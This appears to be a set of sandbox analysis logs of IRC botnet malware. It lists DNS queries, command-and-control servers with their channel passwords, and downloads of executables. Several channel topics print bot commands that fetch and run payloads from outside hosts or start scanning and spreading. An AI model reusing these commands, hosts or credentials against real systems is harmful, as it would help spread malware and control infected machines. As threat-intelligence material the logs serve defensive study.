– DNS Queries (Name, Query Type, Query Result, Successful, Protocol):
  proxim.ntkrnlpa.info DNS_TYPE_A 83.68.16.6 1
– IRC Conversations: From ANUBIS:1035 to 83.68.16.6:80
  Nick: vncvfrot
  Username: j020501
  Private Message to User &virtu3: “”
sec.republicofskorea.info
– DNS Queries (Name, Query Type, Query Result, Successful, Protocol):
  sec.republicofskorea.info DNS_TYPE_A 66.79.160.82 1
+ Opened Listening Ports:
– IRC Conversations: From ANUBIS:1163 to 66.79.160.82:8082
  Nick: [00|USA|XP|403344]
  Username: SP3-817
  Server Pass: 3v1l$
  Joined Channel: ##sploit with Password sPLoiT!
  Channel Topic for Channel ##sploit: “!asc -S -s|!patch|!ip.wg3t -s -S|!ip.wg3t http://205.209.161.194:8095/x C:1.exe 1|!http http://205.209.142.139:9095/s|!asc s 60 3 0 -b -e -s|!asc…
84.244.11.202:31091
– DNS Queries (Name, Query Type, Query Result, Successful, Protocol):
  serv01.colo.owned.hu DNS_TYPE_A 0
– IRC Conversations: From ANUBIS:1032 to 84.244.11.202:31091
  Nick: user|816
  Username: user|816
  Joined Channel: #helpdesk# with Password syslock
serv01.colo.owned.hu/foro.melodiasmoviles.com
– DNS Queries:
  serv01.colo.owned.hu DNS_TYPE_A 87.234.140.73 1
  foro.melodiasmoviles.com DNS_TYPE_A 1
– HTTP Conversations: From ANUBIS:1033 to 74.52.56.242:80 – [foro.melodiasmoviles.com]
  Request: GET /…/lol.exe
  Response: 200 “OK”
– IRC Conversations: 87.234.140.73:31091
  Nick: user|61
  Username: user|61
  Joined Channel: #support# with Password syslock
  Channel Topic for Channel #support#: “! dlx foro.melodiasmoviles.com/…/sshbx5.exe;! scanexec tty1.exe $ip 0”
teek.ihshsd8.com (Baadshah from #bottalk next server)
– DNS Queries: teek.ihshsd8.com
– HTTP Conversations: From ANUBIS:1039 to 72.10.169.26:80 – [72.10.169.26]
  Request: GET /newpack.exe
  Response: 200 “OK”
– IRC Conversations: From ANUBIS:1034 to 72.10.172.218:9928
  Nick: QkmESFPj
  Username: keiqyl
  Joined Channel: #siwa
  Channel Topic for Channel #siwa: “=sns+a5P/xtPiMMQV3WArMqVpEo5yf63afj9I5m9v8Yb8jQyjvrOao6a1D2ggD/yKpW9RhWz0X53yvkkpx6XNxUvY9j4LTZ4T50pVxGMhIxZj7mZxfpCQ2yznwKlKtnHwcB”
rs.wtfbbqz.info
– IRC Conversations: 221.11.6.203:7007
  Nick: [P00|USA|31740]
  Username: XP-4976
  Joined Channel: ##security
xx.ka3ek.com/channellili5.com/zonetech.info
– DNS Queries (Name, Query Type, Query Result, Successful, Protocol):
  xx.ka3ek.com DNS_TYPE_A 67.43.226.242 1
  … DNS_TYPE_A 0
  channellili5.com DNS_TYPE_A 0
  zonetech.info DNS_TYPE_A 72.10.166.195 1
– HTTP Conversations: 72.10.166.195:80 – [zonetech.info]
  Request: GET /ns6.exe
  Response: 200 “OK”
– IRC Conversations: 67.43.226.242:8080
  Nick: VndhdZPk
  Username: nhympp
  Joined Channel: #las6
  Channel Topic for Channel #las6: “=AMZ7AvE/iLXeUnAvUfZPqMvDThxwZSF004FsQnPnjGBPYx8MEknE73CtRA2GdWniEL9hzXmawnM1YrBnc28RA/9z7kQh/g203Sh+tcfAj7W8ar0Ag0HcmdwB7KTzFAe3dlqfGsZ/YaUNJjJvhXKQ+8tnPxENLQqy3mmwMYFsGbuCnShS3fqKrOolhS8UGlttitdMDTAUIXTTgWxC”
  Private Message to Channel #las6: “-^C042^C- Running TFTP wormride…
proxim.ntkrnlpa.info
– DNS Queries: proxim.ntkrnlpa.info
– IRC Conversations: 83.68.16.30:80
  Nick: znmipply
  Username: z020501
  Private Message to User &virtu3: “”
– DNS Queries: millanchannel.info
– HTTP Conversations: 67.18.161.250:80 – [millanchannel.info]
  Request: GET /uddb.exe
  Response: 200 “OK”
  Request: GET /uddb.exe
  Response: 200 “OK”
irc.johnny.gr
– DNS Queries: irc.johnny.gr
– IRC Conversations: 89.163.182.24:1836
  Nick: USA|97757
  Username: pesxw
  Joined Channel: ##pia
nadsam0.info and ss.ka3ek.com
– DNS Queries (Name, Query Type, Query Result, Successful, Protocol):
  ss.ka3ek.com DNS_TYPE_A 67.43.232.36 1
  nadsam0.info DNS_TYPE_A 72.10.167.74 1
– HTTP Conversations: 72.10.167.74:80 – [nadsam0.info]
  Request: GET /x.exe
  Response: 200 “OK”
  Request: GET /is.exe
  Response: 200 “OK”
  Request: GET /laslas.exe
  Response: 200 “OK”
– IRC Conversations: 67.43.232.36:10324
  Nick: VyJodwfX
  Username: woowfk
  Joined Channel: #rs
  Joined Channel: #proxx
  Joined Channel: #kok6
  Joined Channel: #63
  Channel Topic for Channel…